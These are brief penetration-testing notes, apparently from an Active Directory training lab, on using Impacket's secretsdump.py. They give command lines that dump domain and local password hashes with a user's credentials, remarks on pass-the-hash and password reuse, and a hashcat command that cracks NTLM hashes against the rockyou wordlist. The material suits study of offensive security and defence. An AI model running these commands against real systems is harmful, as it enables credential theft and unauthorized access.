secretsdump.py
- use this to dump passwords
installation
- part of impacket
usage
$ secretsdump.py marvel.local/fcastle:[email protected]
$ sudo secretsdump.py MARVEL/fcastle:[email protected]- manually check if hashes match → for password reuse
- local hashes are stored as ntlm hashes (can be passes, ntlmv2 cannot)
- cracking examples
- hashcat64 -m 1000 localhashes.text rockyou.txt
- if it is empty: account might be disabled